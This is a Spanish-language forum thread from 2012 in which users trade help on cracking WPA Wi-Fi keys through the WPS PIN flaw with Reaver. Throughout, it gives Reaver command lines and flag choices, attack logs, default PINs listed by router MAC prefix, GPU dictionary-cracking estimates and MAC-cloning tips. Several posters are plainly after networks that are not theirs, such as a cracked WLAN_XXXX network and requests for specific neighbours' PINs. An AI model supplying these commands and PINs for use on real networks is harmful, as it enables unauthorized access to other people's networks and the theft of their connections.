Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 25 Septiembre 2012, 16:22 pm
P4nd3m0n1um : Ya ha salido  el wpscragui1.1.9 cuanto que da para que sea una versión estable como hago para hacerlo funcionar en el wifislax 4.2 explicamelo porfa que hago hacerlo funcionar .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Septiembre 2012, 01:18 am
P4nd3m0n1um : Ya ha salido  el wpscragui1.1.9 cuanto que da para que sea una versión estable como hago para hacerlo funcionar en el wifislax 4.2 explicamelo porfa que hago hacerlo funcionar .

lo mandas directo a un terminal:

NOTA: No esta empaquetado ni creado ningún modulo, se puede ejecutar desde un terminal como "./WPSCrackGUIv1.1.9beta.gambas".


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 26 Septiembre 2012, 14:02 pm
Haber yo tengo el wifislax4.2 que hago abro la consola de la terminal y escribo hay dentro de la consola del terminal WPSCrackGUIV1.1.9beta.gambas todo esto tengo que poner y se supone que sale no entiendo bien si lo pones aquí en un vídeo o algo te lo agradezco.si me lo descargo en esa version que pasaria con el que ya viene dentro del wifilisx4.2 se sustituye al otro o que para hacer esto necesito internet dentro del programa?.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: chatanegra en 26 Septiembre 2012, 21:32 pm
hola me pasa como el amigo ps3ps3ps3 sobre el tema de que cuando guardo sesion me sale un archivo en el escritorio me refiero al wifiway3.4 wps reaver con wpscrackgui1.7 el cual lo tengo grabado en un pen drive con el linuxliveusb,pues eso,quiero comenzar sesion con el archivo guardado en el escritorio y no se como,me podeis ayudar gracias.
guarde un 10%,este me creo un archivo en el escritorio como decia,apagé el ordenador y si me podeis explicar desde nuevo en el escritorio del wifiway 3.4 wps reaver lo que tengo que hacer,he leido algo de guardarlo en la carpeta modulos pero ya no sé mas y tampoco me aclaro bueno lo dicho gracias y un salu2.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 26 Septiembre 2012, 22:42 pm
P4nd3m0n1um, una duda que a lo mejor no tendria que ponerlo aki.
Mira he sacado la pass con reaver de una WLAN_XXXX pero al conectar me dice que es correcta pero me pone red sin identificar. No se que ip ni que puerta de enlace poner para que pueda navegar. que me aconsejas?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 27 Septiembre 2012, 04:05 am
P4nd3m0n1um, una duda que a lo mejor no tendria que ponerlo aki.
Mira he sacado la pass con reaver de una WLAN_XXXX pero al conectar me dice que es correcta pero me pone red sin identificar. No se que ip ni que puerta de enlace poner para que pueda navegar. que me aconsejas?

y proba de poner los DNS de google 8.8.8.8 y 8.8.4.4 o 4.4.4.4, haber si te da algo, sino habría que ver probar cambiando mac..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 27 Septiembre 2012, 22:14 pm
No me funciona...mira que pongo aki:
-Direccion IP
-Mascara de subred
-Puerta de enlace
-DNS preferido
-DNS alternativo

Al ponerlo en automatico tampoco me deja...que me aconsejas


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 28 Septiembre 2012, 18:07 pm
proba de clonar mac


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 28 Septiembre 2012, 18:22 pm
voy a probar con lo de la mac pero no se yo......
Lo que te puse antes de direccion ip, puerta de enlace etc no sabrias decirme algo?? estoy probando diferentes ip pero me sigue saliendo lo de red no identificada.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 28 Septiembre 2012, 18:55 pm
¿A alguien más le ha pasado que, al atacar una Orange (00:19:70:...), con el PIN por defecto (12345670) y reaver 1.3, le devuelva "key cracked", pero no la clave WPA?

Código:
[+] Trying pin 12345670
[+] Key cracked in 23 seconds
[+] WPS PIN: '12345670'
[+] Nothing done, nothing to save.
$

¿Es por alguna clase de bloqueo o protección del router?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 28 Septiembre 2012, 19:32 pm
¿A alguien más le ha pasado que, al atacar una Orange (00:19:70:...), con el PIN por defecto (12345670) y reaver 1.3, le devuelva "key cracked", pero no la clave WPA?

Código:
[+] Trying pin 12345670
[+] Key cracked in 23 seconds
[+] WPS PIN: '12345670'
[+] Nothing done, nothing to save.
$

¿Es por alguna clase de bloqueo o protección del router?

yo estoy igual que tu.....no tengo ni idea del porque.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 28 Septiembre 2012, 21:35 pm
Que raro a lo mejor la version 1.3 del reaver no saca la clave bien tendra algun fallo probar con la version 1.4 a mi nunca me saca la clave ni con la 1.3 ni con la 1.4 la mac 00:19:70 el pin por defecto se supone que 12345670 pero no tiene por que ser esa vienes mas pines diferente probar otro pin diferente yo ya he probado mucho pines y no saco nada haber si me puedo comprar una antena buena y hace algo y eso que prober en casa de un amigo con una antena buenesuta de unos 5db y se kedo la 91 por cineto y ponia tiempo de esperar un buen rato pero no lo deja mas tiempo asin que me quede con la duda si iba o no a sacar la clave. habeis sacado alguna orange con esa mac 00:19:70 de estas he visto yo unas cuantas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: emex9103 en 29 Septiembre 2012, 14:38 pm
Alguien ha conseguido la wpa de una WLAN_XXXX D0:AE:EC:XX:XX:XX ?

Con esta no hay manera dos dias y nada


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 29 Septiembre 2012, 15:13 pm
emex9103 : Hola a mi me sale que el pin es este lo he consultado WLAN_XXXX D0:AE:EC  PIN:50892372  pruebalo y dime si sacas la clave o no.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: dakarpesca en 29 Septiembre 2012, 20:15 pm
los router de ono parecen mas vulnerable al ataque wps


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: wfcron en 29 Septiembre 2012, 22:21 pm
¿Qué comando es más efectivo?

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -p xxxx
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -p xxxxxxxx
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 14:453 -l 300 -p xxxx
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 15:450 -l 300 -p xxxx

¿Algún otro mejor?

Gracias.  ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 29 Septiembre 2012, 23:23 pm
¿A alguien más le ha pasado que, al atacar una Orange (00:19:70:...), con el PIN por defecto (12345670) y reaver 1.3, le devuelva "key cracked", pero no la clave WPA?

Código:
[+] Trying pin 12345670
[+] Key cracked in 23 seconds
[+] WPS PIN: '12345670'
[+] Nothing done, nothing to save.
$

¿Es por alguna clase de bloqueo o protección del router?

se hablo anteriormente: http://foro.elhacker.net/wireless_en_linux/reaver_vulnerabilidad_de_wpa_por_wps_habilitado-t350507.0.html;msg1786572#msg1786572 (http://foro.elhacker.net/wireless_en_linux/reaver_vulnerabilidad_de_wpa_por_wps_habilitado-t350507.0.html;msg1786572#msg1786572)

¿Qué comando es más efectivo?

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -p xxxx
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -p xxxxxxxx
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 14:453 -l 300 -p xxxx
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 15:450 -l 300 -p xxxx

¿Algún otro mejor?

Gracias.  ;)

si sabes el pin cualquiera es efectivo..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 30 Septiembre 2012, 00:10 am
Pues aquí hay un hilo,  P4nd3m0n1um , "Reaver uso y problemas" en el que un usuario (user007),afirma que aún con el pin correcto, no lanza la clave su router, con el reaver 1.4, sí con el 1.3,sería bueno que facilitara datos, para así ir viendo qué routers son definitivamente invulnerables a la auditoria wps, para tranquilidad de dichos usuarios. Un hilo muy interesante que deja entrever algo de la falta de robustez del reaver respecto a algunos routers, más bien de las actualizaciones del reaver.  :huh:

http://foro.seguridadwireless.net/live-cd-wifiway/reaver-uso-y-solucion-de-problemas/160/

P.D. Vaya he mezclado foros, hacker.net y seguridadwireless, no ha sido intencionado, saludos y disculpas.
 :silbar:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: wfcron en 30 Septiembre 2012, 00:58 am
si sabes el pin cualquiera es efectivo..

Pero... ¿cuál es el que se suele utilizar más?

Por cierto, ¿cómo saco el pin de mi router? :rolleyes:

Porque en el apartado del pin siempre he puesto 12345670.

P.D.: Estoy algo perdido en el tema del pin.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 30 Septiembre 2012, 02:05 am
@capitanfanegas: cosas que se han hablado en las 43 paginas de este hilo...  :¬¬

@wfcron: si no sabes el pin no lo tenes que especificar, si lo especificas y no te da nada es que no es el pin.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 30 Septiembre 2012, 02:43 am
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300

son peores que atacar solamente con reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv, con un router Thomson atacando normal pruebas 10 pines cada 10 minutos, con este ataque prueba 5 pines cada 10 minutos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: emex9103 en 30 Septiembre 2012, 05:44 am
emex9103 : Hola a mi me sale que el pin es este lo he consultado WLAN_XXXX D0:AE:EC  PIN:50892372  pruebalo y dime si sacas la clave o no.

Gracias

Pero no funciono aunque tambien me esa dando errores tipo (wps transaction failed (code 0x03) re-trying last pin)

Ese error me lo da en blacktrack ahora estoy con un nuevo intento desde wifislax 4.2 usando minidwep y hay no muestra los errores pero me imagino que segira igual


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: wfcron en 30 Septiembre 2012, 18:04 pm
son peores que atacar solamente con reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv, con un router Thomson atacando normal pruebas 10 pines cada 10 minutos, con este ataque prueba 5 pines cada 10 minutos.

Gracias. Entonces es mejor este comando "reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv", que "reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -vv", ¿no?

Debido a que según explicas, en el mismo tiempo realiza el doble de comprobaciones de pines, ¿no?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 30 Septiembre 2012, 18:12 pm
wfcron : Yo he metido ese comando que tu dices y parece mejor no se , a mi me sale 250 segundo pin esperando sabes y despues empieza a repetir el mismo porcentaje 91 por ciento pero eso kiere decir que no va sacar la clave creo.

emex9103: Yo lo intentado en las Orange y me sale eso tambien code 0x03) re-trying last pin pero a mi si se me asocia pero como siempre no saca la clave , con el wifislax 4.2 yo ya he intentado el miniwep con este comando que te sale por defecto en ese progama reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 300 -vv y es verdad sale menos errores pero creo que te hace lo mismo tio por lo menos a mi me hace los mimos es mas limpio prueba con el mismo pin que le metas o con otro que vaya sacado el programa solo .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: wfcron en 30 Septiembre 2012, 18:32 pm
wfcron : Yo he metido ese comando que tu dices y parece mejor no se , a mi me sale 250 segundo pin esperando sabes y despues empieza a repetir el mismo porcentaje 91 por ciento pero eso kiere decir que no va sacar la clave creo.

¿A cúal de los dos comandos te refieres elsevi? ¿Utilizas otro que te vaya mejor?

Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 30 Septiembre 2012, 23:56 pm
¿A cúal de los dos comandos te refieres elsevi? ¿Utilizas otro que te vaya mejor?

Gracias.

Código:
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -v -S -x 20 -r 100:10 -l 250

solo cambia el tiempo de espera cuando se bloquea, pero si el router se bloquea por 4 días, los 250 segundos me los meto..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 1 Octubre 2012, 00:00 am
y el tiempo de espera que es lo que hace esperar para sacar la clave o esperar para intentar que se desbloque el router y seguir intentadolo? Eso quiere decir que no sacara la clave tambien verdad o no.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Octubre 2012, 00:01 am
Que significa cada ataque:

Código:
-a, --auto                      Auto detectar las mejores opciones avanzadas para realizar el ataque al AP.
-v, --verbose                   Muestra solamente unos pasos, los errores son ocultos críticas advertencias (-vv para ver los errores y todo el proceso completo).
-S, --dh-small                  Utilice pequeñas llaves DH para mejorar la velocidad del crackeo.
-x, --fail-wait=<seconds>       Programe la hora de dormir después de 10 fallos inesperados [20]
-l, --lock-delay=<seconds>      Establecer el tiempo de espera si el AP WPS se bloquea luego de varios intentos de PIN [60/250/300]


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Octubre 2012, 00:03 am
y el tiempo de espera que es lo que hace esperar para sacar la clave o esperar para intentar que se desbloque el router y seguir intentadolo? Eso quiere decir que no sacara la clave tambien verdad o no.

se bloquea el router, pasa a esperar los 60/250/300 segundos antes de comenzar con un nuevo pin; pero si esta bloqueado todavía va a seguir igual...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: wfcron en 1 Octubre 2012, 00:40 am
se bloquea el router, pasa a esperar los 60/250/300 segundos antes de comenzar con un nuevo pin; pero si esta bloqueado todavía va a seguir igual...

Entonces... ¿que intervalo de segundos sería el más adecuado P4nd3m0n1um?

¿O mejor optar sin intervalo "reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv"?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Octubre 2012, 00:47 am
Entonces... ¿que intervalo de segundos sería el más adecuado P4nd3m0n1um?

¿O mejor optar sin intervalo "reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv"?

es que por más que lo especifiques por ejemplo si hay routers que se bloquean por 10 minutos.. pero con estos bichos mutantes que tenemos ahora que se bloquean por más de 4 días es medio innecesario establecerlo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: wfcron en 1 Octubre 2012, 01:04 am
es que por más que lo especifiques por ejemplo si hay routers que se bloquean por 10 minutos.. pero con estos bichos mutantes que tenemos ahora que se bloquean por más de 4 días es medio innecesario establecerlo.

Entonces... ¿es necesario establecer tal intervalo, o se puede prescindir de el?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Octubre 2012, 01:15 am
Entonces... ¿es necesario establecer tal intervalo, o se puede prescindir de el?

Es necesario si el router se bloquea y desbloquea en un lapso de X tiempo de 60/250/300 (5Minutos) segundos.

Pero se se bloquea por días no es necesario.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: wfcron en 1 Octubre 2012, 01:32 am
Es necesario si el router se bloquea y desbloquea en un lapso de X tiempo de 60/250/300 (5Minutos) segundos.

Pero se se bloquea por días no es necesario.
De acuerdo P4nd3m0n1um. Gracias por tu ayuda.

Salu2!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 1 Octubre 2012, 19:58 pm
proba de clonar mac

No puedo clonarle la mac porque no consigo ver a ningun cliente conectado. ¿que hago?
no existe algun programa que me de la puerta de enlace, ip etc....??


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 3 Octubre 2012, 19:52 pm
Tengo a mi disposicion un router de onoxxxxxx de 100 megas con mac 70:71:BC WPA2 PSK. La clave son solo 9 numero y no tiene el wps activado por defecto. Quien quiera datos que me lo diga por privado salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 3 Octubre 2012, 21:18 pm
Tengo a mi disposicion un router de onoxxxxxx de 100 megas con mac 70:71:BC WPA2 PSK. La clave son solo 9 numero y no tiene el wps activado por defecto. Quien quiera datos que me lo diga por privado salu2

para eso si tienes una buena gráfica, utiliza el gpu cracking...

tamaño del diccionario 10 gb
tiempo en pasarlo a 80000 c/s 3,4 horas


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 4 Octubre 2012, 00:17 am
P4nd3m0n1um me puedes decir el formato que tienen las claves por defecto de las tp-link para ver si puedo crear un diccionario???


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 4 Octubre 2012, 01:02 am
P4nd3m0n1um me puedes decir el formato que tienen las claves por defecto de las tp-link para ver si puedo crear un diccionario???

clave por defecto no tienen, el pin si quieres te paso un par.. con MAC y Serie..  ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: magp_90 en 4 Octubre 2012, 10:25 am
clave por defecto no tienen, el pin si quieres te paso un par.. con MAC y Serie..  ;)

como que no tienen clave por defecto??
intenta pasarme lo que tengas acerca de ellas


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: davidtuti en 4 Octubre 2012, 12:25 pm
Hola a todos,
Estoy intentando auditar mi router pero soy incapaz de Reaver me suba del 0%. Me da constantemente error 0x02.

Código:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID   Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------

xx:xx:xx:xx:xx:xx   1  -49    1.0    No       WLAN_XXXX


El log del reaver es

Código:
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: WLAN_XXXX)
...................
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
......
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-10-03 19:31:05 (0 seconds/pin)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: WLAN_XXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: WLAN_XXXX)
.................

Alguna ayuda por favor?
Gracias y saludos,


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 4 Octubre 2012, 18:37 pm
Hola a todos,
Estoy intentando auditar mi router pero soy incapaz de Reaver me suba del 0%. Me da constantemente error 0x02.

Código:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID   Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------

xx:xx:xx:xx:xx:xx   1  -49    1.0    No       WLAN_XXXX


El log del reaver es

Código:
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: WLAN_XXXX)
...................
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
......
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-10-03 19:31:05 (0 seconds/pin)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: WLAN_XXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: WLAN_XXXX)
.................

Alguna ayuda por favor?
Gracias y saludos,

Tu router son los nuevos de telefonica? Esos son casi imposibles ya que son inmunes al ataque wps salu2


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: davidtuti en 4 Octubre 2012, 18:48 pm
Tu router son los nuevos de telefonica? Esos son casi imposibles ya que son inmunes al ataque wps salu2

Mi router es un OBSERVA TELECOM, AW4062

Saludos,


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 4 Octubre 2012, 22:53 pm
Hola a todos,
Estoy intentando auditar mi router pero soy incapaz de Reaver me suba del 0%. Me da constantemente error 0x02.

Código:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID   Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------

xx:xx:xx:xx:xx:xx   1  -49    1.0    No       WLAN_XXXX


El log del reaver es

Código:
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: WLAN_XXXX)
...................
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
......
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-10-03 19:31:05 (0 seconds/pin)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: WLAN_XXXX)
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: WLAN_XXXX)
.................

Alguna ayuda por favor?
Gracias y saludos,


aunque creo que ya te he contestado ;)

ese error es porque tienes pbc en router y aunque tengas configurado el wps en activado, para que funcione tienes que dar físicamente al boton que lleva el router

un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: davidtuti en 4 Octubre 2012, 23:15 pm
Gracias.
A q te refieres con dar el boton?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 5 Octubre 2012, 03:53 am
Gracias.
A q te refieres con dar el boton?

tan difícil es leer lo que hacemos... que es el WPS? http://es.wikipedia.org/wiki/Wi-fi_protected_setup


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 11 Octubre 2012, 02:56 am
P4nd3m0n1um : Me aparece una red muy rara para mi, haber si me explica a que es debido esto vale mi ordenador al detectar wifi me sale una WLAN_E6A0 esta red sale normal y despues me sale otra red parecida a esta  WLAN_E6A0_xt  que significa esto es muy raro por que es muy parecida a la otra las dos redes son WPA PSK lo que no entiendo en la WLAN_E6A0 por que pone _xt eso por que es para confundir o que.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 11 Octubre 2012, 05:11 am
debe ser un repetidor.. q se yo..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 11 Octubre 2012, 20:34 pm
un repetidir como ? que tenga dos wlan_ como esas que he puesto arriba o que reciba la misma señal no se es muy raro.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: warcry. en 11 Octubre 2012, 20:47 pm
con w7 te puedes hacer un ap virtual, utilizando el mismo interface wifi que utilizas para conectarte con tu ap, por ejemplo y a ese ap virtual lo puedes llamar como te de la gana, luego no te extrañe que le llame como el ap original y solo le añada una extensión para diferenciarlo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 12 Octubre 2012, 02:26 am
un repetidir como ? que tenga dos wlan_ como esas que he puesto arriba o que reciba la misma señal no se es muy raro.

si o multi-wlan... por ejemplo con un router mikrotik puedes generar infinitos ap virtuales..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 13 Octubre 2012, 02:55 am
aam pues no lo sabia pero eso para que vale tener dos wlan asin parecida para confundir .gracias por explicarmelo.



aqui os dejo algunos datos : por si le sirve a alguien.

WLAN_XXXX

MAC: 8C:0C:A3:XX:XX:XX

WPA: 20 Digitos comprendidos entre numeros y letras mayusculas.

WPS: 9360XXXX

[MOD] No hagas doble post. usa el botón "modificar", gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 15 Octubre 2012, 03:25 am
vale tener dos wlan asin parecida para confundir

En realidad no es para confundir.. podes utilizarlo para múltiples cosas, por ejemplo que los usuarios que se conecten a la1 tengan solamente 12kb/12kb.. o los que se conecten en la2 tengan que hacer un login de hotspot.. trabajo de redes independientes.. etc.

(http://i.minus.com/ibj8sxAmAiXzmp.JPG)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 15 Octubre 2012, 04:55 am
aam vale aora lo entiendo mejor es un punto de aceso de internet a lo mejor para tenerlo en su casa el vecino verdad para que se pueda conectar desde cualquier punto de la casa tambien puede ser para eso verdad es que esa wlan que te dije nunca me habia detectado mi portatil entoces me salio la wlan_xxxx normal que dije antes y despues otra muy parecida txt cosa que nunca he visto y me resulto raro solo pregunte por curiosidad ustedes sabeis mas de esto .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 15 Octubre 2012, 15:47 pm
aqui os dejo algunos datos : por si le sirve a alguien.

WLAN_XXXX

MAC: 8C:0C:A3:XX:XX:XX

WPA: 20 Digitos comprendidos entre numeros y letras mayusculas.

WPS: 9360XXXX

Hola elsevi, ¿Ha sido auditado por ti ese router, los famosos "8c:0c:a3...", que son invulnerables, o la has copiado de la etiqueta del router, en algún número de ingeniería social? Saludos!


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 16 Octubre 2012, 01:34 am
Lo he leiido en otro foro de internet recientemente lo habra sacado con ese pin prueba haber si te sirve lo puse aqui por que leei que habia gente que no lo habian sacado el pin completo no lo se por que no dejan ponerlo en el foro que lo vi solo puede cojer estos datos probar haber si os sirve saludos.



P4nd3m0n1um : Echame una mano haber si tu sabes el Pin de esta WLAN_E6A0 LA MAC : D0:AE:EC:XX:XX:XX si alguien lo sabe que por favor lo ponga aqui y que ponga el pin completo. Gracias.


[MOD] No hagas doble post, usa el botón "modificar", gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 17 Octubre 2012, 05:32 am
Les traigo una noticia, me llego un nuevo equipo TP-Link TL-WA7510N todos por defecto con el pin:

(http://i.minus.com/ibipMBZDuywc7A.PNG)



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Moype en 17 Octubre 2012, 17:58 pm
Hola a todos.

Tengo unas dudas sobre reaver lo ejecutó desde el LiveCD de wifiway 3.4, sigo el tutorial al pie de la letra y todo ok hasta que...
 [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request [!] WARNING: Receive timeout occurred
Una y otra vez y siempre intenta con el mismo pin, si me podéis indicar que debo hacer o que hago mal o... Nose lo he dejado unas 6 horas y nada no sube el 0,00%
Normalmente lo he intentado con: reaver -i mon0 -b (bssid) -cc
Uso atheros ar9285 y la Macha del AP es 00:19:15:XX:XX:XX

Si podéis echarme una mano lo agradecería un montón ya no se seguir


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 17 Octubre 2012, 18:45 pm
@Moype: ¿Has probado con algún PIN por defecto? Estos routers (00:19:15) a vecen traen el 12345670:

reaver -i mon0 -b BSSID -p12345670 -vv


